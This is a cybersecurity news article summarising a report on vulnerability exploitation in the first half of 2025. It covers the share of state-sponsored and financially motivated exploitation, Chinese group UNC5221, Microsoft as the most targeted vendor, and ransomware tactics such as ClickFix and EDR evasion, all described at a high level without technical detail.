▼ Summary
– 53% of vulnerability exploits in H1 2025 were by state-sponsored actors, primarily for geopolitical purposes like espionage and surveillance.
– Chinese state-sponsored groups were the most active, targeting edge infrastructure and enterprise solutions, with UNC5221 exploiting the most vulnerabilities.
– 47% of exploits were financially motivated, with 27% from theft/fraud groups and 20% from ransomware/extortion groups.
– 69% of exploited vulnerabilities required no authentication, and 30% enabled remote code execution, allowing attacks directly from the internet.
– Ransomware actors adopted new initial access techniques like ClickFix social engineering and increased use of EDR evasion methods post-compromise.
A new cybersecurity report reveals that state-sponsored hackers were responsible for over half of all attributed software vulnerability exploits during the first half of 2025. These sophisticated actors, backed by national governments, primarily leverage security flaws for strategic espionage and surveillance operations rather than financial gain. The findings underscore a significant shift toward highly targeted campaigns aimed at critical infrastructure and enterprise systems.
According to the analysis, Chinese state-linked groups dominated these activities, focusing heavily on edge infrastructure and widely-used enterprise solutions. Among these, a cluster known as UNC5221 stood out for its aggressive exploitation of vulnerabilities in Ivani products, including Endpoint Manager Mobile, Connect Secure, and Policy Secure. Their operations reflect a continued pattern observed since the previous year.
Financially motivated actors accounted for the remainder of the exploitation activity. Approximately 27% of incidents involved theft and fraud unrelated to ransomware, while another 20% were tied directly to ransomware and extortion groups. Despite differing motives, both state and criminal hackers showed a strong preference for targeting edge security appliances, remote access services, and gateway-level software due to the high strategic value these systems provide.
Microsoft emerged as the most frequently targeted vendor, with its products involved in 17% of all documented exploitations. The sheer prevalence of Microsoft software in organizational environments makes it an attractive objective for attackers seeking maximum impact.
Alarmingly, the majority of exploited vulnerabilities required no authentication, meaning attackers could launch assaults directly over the internet without needing login credentials or internal network access. Nearly 70% of the 161 distinct vulnerabilities fell into this category, with almost half being remotely exploitable. Furthermore, 30% of these flaws enabled remote code execution, often granting complete control over compromised systems.
The report also highlighted the rise of “ClickFix” as a preferred social engineering technique among ransomware groups. This method involves deceiving users with fake error messages that prompt them to copy and paste malicious scripts, effectively bypassing security measures by relying on human error rather than technical weakness. A group called Interlock used this approach extensively in early 2025, later evolving their tactics to include “FileFix,” which manipulates users into entering harmful file paths directly into Windows Explorer.
Beyond initial access, ransomware actors are increasingly adopting advanced methods to avoid detection. These include bring-your-own-installer (BYOI) techniques to evade endpoint detection and response (EDR) systems, along with custom payloads that use just-in-time hooking and memory injection. These strategies allow attackers to maintain persistence and operate stealthily within compromised networks.
Researchers anticipate that both state-aligned and financially driven threat groups will continue prioritizing these attack vectors throughout the remainder of the year, especially as the number of disclosed vulnerabilities continues to climb.
(Source: NewsAPI Cybersecurity & Enterprise)
-
-
-
-
-
-
